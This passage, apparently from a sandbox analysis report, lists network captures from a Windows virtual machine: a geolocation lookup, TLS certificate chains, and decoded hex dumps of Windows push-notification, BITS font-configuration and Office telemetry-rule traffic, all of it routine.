                                                                                                                                                                                                                                                                                              Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.357836008 CET13.107.246.63443192.168.2.649732CN=*.azureedge.net, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 19 17:30:52 CEST 2024 Thu Jun 08 02:00:00 CEST 2023 Thu Aug 01 14:00:00 CEST 2013Sun Sep 14 17:30:52 CEST 2025 Wed Aug 26 01:59:59 CEST 2026 Fri Jan 15 13:00:00 CET 2038771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,028a2c9bd18a11de089ef85a160da29e4
                                                                                                                                                                                                                                                                                              CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Jun 08 02:00:00 CEST 2023Wed Aug 26 01:59:59 CEST 2026
                                                                                                                                                                                                                                                                                              CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Aug 01 14:00:00 CEST 2013Fri Jan 15 13:00:00 CET 2038
                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              0192.168.2.64970820.198.118.190443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:01 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 76 4a 2b 44 38 34 77 6c 4f 6b 4f 62 74 66 36 32 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 32 61 61 66 30 39 36 61 30 66 30 35 32 32 33 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: vJ+D84wlOkObtf62.1Context: 32aaf096a0f05223
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:01 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:01 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 76 4a 2b 44 38 34 77 6c 4f 6b 4f 62 74 66 36 32 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 32 61 61 66 30 39 36 61 30 66 30 35 32 32 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 7a 55 45 6b 33 4e 66 59 68 39 44 37 4a 45 5a 56 62 6c 51 70 7a 62 55 68 49 35 31 6e 4c 71 31 6c 79 78 73 49 65 70 6c 50 58 6f 72 4f 79 52 49 56 48 6e 75 53 2b 51 69 6e 32 63 6a 51 38 47 78 6c 52 66 65 2f 66 72 53 38 6e 4e 35 33 45 6b 50 56 49 67 5a 54 76 4c 63 7a 43 74 4b 2f 74 4b 78 6b 4e 6c 45 66 39 33 48 61 4b 43 39 4b
                                                                                                                                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: vJ+D84wlOkObtf62.2Context: 32aaf096a0f05223<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXzUEk3NfYh9D7JEZVblQpzbUhI51nLq1lyxsIeplPXorOyRIVHnuS+Qin2cjQ8GxlRfe/frS8nN53EkPVIgZTvLczCtK/tKxkNlEf93HaKC9K
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:01 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 76 4a 2b 44 38 34 77 6c 4f 6b 4f 62 74 66 36 32 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 32 61 61 66 30 39 36 61 30 66 30 35 32 32 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: vJ+D84wlOkObtf62.3Context: 32aaf096a0f05223<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:02 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:02 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6c 41 70 69 51 2b 54 56 78 55 36 4e 70 4b 4a 2b 37 4e 4d 51 72 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                              Data Ascii: MS-CV: lApiQ+TVxU6NpKJ+7NMQrA.0Payload parsing failed.


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              1192.168.2.64971320.198.119.143443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:08 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4c 73 47 6f 6a 5a 4d 4c 4a 45 53 6a 71 66 58 45 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 35 62 62 32 31 62 35 38 38 33 32 31 31 30 36 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: LsGojZMLJESjqfXE.1Context: 75bb21b588321106
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:08 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:08 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4c 73 47 6f 6a 5a 4d 4c 4a 45 53 6a 71 66 58 45 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 35 62 62 32 31 62 35 38 38 33 32 31 31 30 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 75 30 6e 7a 46 74 78 61 77 47 2b 62 4c 68 74 52 6e 32 41 44 6c 4a 49 46 78 41 51 66 73 49 6d 61 65 71 50 73 70 52 73 73 6e 72 71 71 61 2f 62 65 4e 5a 77 2f 75 5a 59 78 30 6d 59 6a 67 42 4a 4c 52 4b 35 76 46 77 57 4b 58 58 2f 57 2f 76 6d 6a 6f 56 39 39 32 49 6c 68 68 50 34 6f 37 6b 66 42 69 55 4f 73 76 57 57 55 32 77 31 2b
                                                                                                                                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: LsGojZMLJESjqfXE.2Context: 75bb21b588321106<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXu0nzFtxawG+bLhtRn2ADlJIFxAQfsImaeqPspRssnrqqa/beNZw/uZYx0mYjgBJLRK5vFwWKXX/W/vmjoV992IlhhP4o7kfBiUOsvWWU2w1+
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:08 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4c 73 47 6f 6a 5a 4d 4c 4a 45 53 6a 71 66 58 45 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 35 62 62 32 31 62 35 38 38 33 32 31 31 30 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: LsGojZMLJESjqfXE.3Context: 75bb21b588321106<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:08 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:08 UTC58INData Raw: 4d 53 2d 43 56 3a 20 7a 6f 67 68 6b 58 63 39 48 45 4b 73 69 70 73 50 47 6b 6b 53 55 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                              Data Ascii: MS-CV: zoghkXc9HEKsipsPGkkSUA.0Payload parsing failed.


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              2192.168.2.64971723.218.208.109443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:08 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:09 UTC478INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                              Server: Kestrel
                                                                                                                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                              X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                              X-OSID: 2
                                                                                                                                                                                                                                                                                              X-CID: 2
                                                                                                                                                                                                                                                                                              X-CCC: GB
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=71918
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:08 GMT
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              X-CID: 2


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              3192.168.2.64971923.218.208.109443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:10 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                              Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:11 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                              ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                              X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=72993
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:11 GMT
                                                                                                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              X-CID: 2
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:11 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              4192.168.2.64972113.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:13 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:14 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:13 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                                                                                                              Content-Length: 218853
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                              Cache-Control: public
                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 27 Nov 2024 15:11:14 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DD0EF5BC53602D"
                                                                                                                                                                                                                                                                                              x-ms-request-id: a5a19dc6-401e-008c-1dff-4086c2000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062213Z-174f78459684bddphC1EWRbht40000000xs0000000009gcd
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:14 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                              Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:14 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                                                                                                                                                                                                                                                              Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:14 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                                                                                                                                                                                                                                                                              Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:14 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                                                                                                                                                                                                                                                                              Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:14 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
